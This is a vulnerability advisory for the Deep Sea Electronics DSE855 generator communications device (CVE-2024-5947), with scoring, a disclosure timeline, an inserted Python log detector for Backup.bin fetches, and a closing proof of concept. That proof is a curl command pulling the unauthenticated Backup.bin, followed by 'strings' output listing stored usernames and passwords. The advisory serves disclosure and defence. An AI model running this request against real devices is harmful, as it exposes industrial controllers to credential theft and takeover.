Deep Sea Electronics DSE855 Remote Authentication Bypass

2024-07-03 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS3: 6.5
Attack Vector: ADJACENT
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 6.8
Confidence: High
EPSS: 0.001
Percentile: 29.8%

Title: Deep Sea Electronics DSE855 Remote Authentication Bypass
Advisory ID: ZSL-2024-5825
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (5/5)
Release Date: 03.07.2024

Summary

The DSE855 communications device allows monitoring of a single DSE controller with USB connectivity over a LAN or WAN connection. To achieve this the DSE855 utilises its in-built web server or MODBUS TCP. In order to use over a LAN connection the on-site router must be configured to be accessible from any global location.

Description

The device is vulnerable to configuration disclosure when a direct object reference is made to the Backup.bin file using an unauthenticated HTTP GET request. The backup contains the device configuration, including stored account names and passwords, which enables an attacker to disclose sensitive information and use it for authentication bypass, privilege escalation and full system access.
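As an added, defender-side example (not part of the advisory or of any vendor tooling), the following Python flags successful fetches of the Backup.bin object in web-server or proxy access logs, so that exposure of a DSE855 can be spotted and reviewed; the log lines and the 10.0.5.0/24 maintenance network are constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample access-log lines (Common Log Format) for illustration;
# they are not from the advisory or from any real DSE855 device.
SAMPLE_LOG = """\
10.0.5.23 - - [03/Jul/2024:09:12:41 +0000] "GET /index.htm HTTP/1.1" 200 4120
203.0.113.77 - - [03/Jul/2024:09:13:02 +0000] "GET /Backup.bin HTTP/1.1" 200 8192
10.0.5.9 - - [03/Jul/2024:09:15:30 +0000] "GET /backup.bin HTTP/1.1" 200 8192
10.0.5.9 - - [03/Jul/2024:09:16:00 +0000] "GET /Backup.bin HTTP/1.1" 401 0
198.51.100.4 - - [03/Jul/2024:09:17:11 +0000] "HEAD /Backup.bin HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Assumed maintenance network allowed to pull backups (not from the advisory).
MAINTENANCE_NETS = [ip_network("10.0.5.0/24")]


def is_maintenance_source(src: str) -> bool:
    """True if the client address belongs to an allow-listed maintenance net."""
    addr = ip_address(src)
    return any(addr in net for net in MAINTENANCE_NETS)


def find_backup_disclosures(log_text: str) -> list:
    """One finding per successful (2xx) fetch of Backup.bin. A 401/403 means
    authentication was enforced and is not reported. GET from outside the
    maintenance net is 'high' (the stored credentials left the device);
    HEAD or an allow-listed source is 'medium' so it is still reviewed."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip
        path = m["path"].split("?", 1)[0]
        if path.lower() != "/backup.bin":  # case-insensitive to cover lax servers
            continue
        status = int(m["status"])
        if not 200 <= status < 300:
            continue
        external = not is_maintenance_source(m["src"])
        severity = "high" if m["method"] == "GET" and external else "medium"
        findings.append({"ts": m["ts"], "src": m["src"], "method": m["method"],
                         "status": status, "severity": severity})
    return findings
```

Any "high" finding on a device still running the affected firmware should be treated as a credential compromise of every account stored on it.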

Vendor

Deep Sea Electronics plc - <https://www.deepseaelectronics.com>

Affected Version

Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0

Tested On

embOS/IP

Vendor Status

[10.11.2023] Vulnerability discovered.
[14.11.2023] Vendor communicated via Trend Micro’s Zero Day Initiative program.
[13.06.2024] ZDI-24-671 advisory released.
[03.07.2024] Public security advisory released.
[18.09.2024] Vendor releases updated firmware to address this issue.

PoC

dse855_auth.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zerodayinitiative.com/advisories/ZDI-24-671/>
[2] <https://vulners.com/cve/CVE-2024-5947>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2024-5947>
[4] <https://packetstormsecurity.com/files/179342/>
[5] <https://pentest-tools.com/vulnerabilities-exploits/deep-sea-electronics-dse855-authentication-bypass_22935>
[6] <https://www.zerodayinitiative.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855>
[7] <https://www.deepseaelectronics.com/genset/remote-communications-overview-displays/dse855/software>

Changelog

[03.07.2024] - Initial release
[26.07.2024] - Added reference [4], [5] and [6]
[18.09.2024] - Added vendor status and reference [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

Deep Sea Electronics DSE855 Remote Authentication Bypass


Vendor: Deep Sea Electronics plc
Product web page: https://www.deepseaelectronics.com
Affected version: Model: DSE855
                  Software version: 1.0.26
                  Module version: 1.0.78
                  Bootloader version: 1.0.3
                  Firmware version: 1.1.0

Summary: The DSE855 communications device allows monitoring of a single
DSE controller with USB connectivity over a LAN or WAN connection. To achieve
this the DSE855 utilises its in-built web server or MODBUS TCP. In order
to use over a LAN connection the on-site router must be configured to be
accessible from any global location.

Desc: The device is vulnerable to configuration disclosure when direct object
reference is made to the Backup.bin file using an HTTP GET request. This will
enable an attacker to disclose sensitive information and help her in authentication
bypass, privilege escalation and full system access.

Tested on: embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5825
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php
ZDI ID: ZDI-24-671
ZDI CAN: ZDI-CAN-22679
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability
CVE ID: CVE-2024-5947
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947


10.11.2023

--


$ curl -s -O http://target/Backup.bin
$ strings Backup.bin

DSEB
Admin
Password1234
Tech
Password1234
thricer
scada
rd1234
lokna
xela123
DSE855
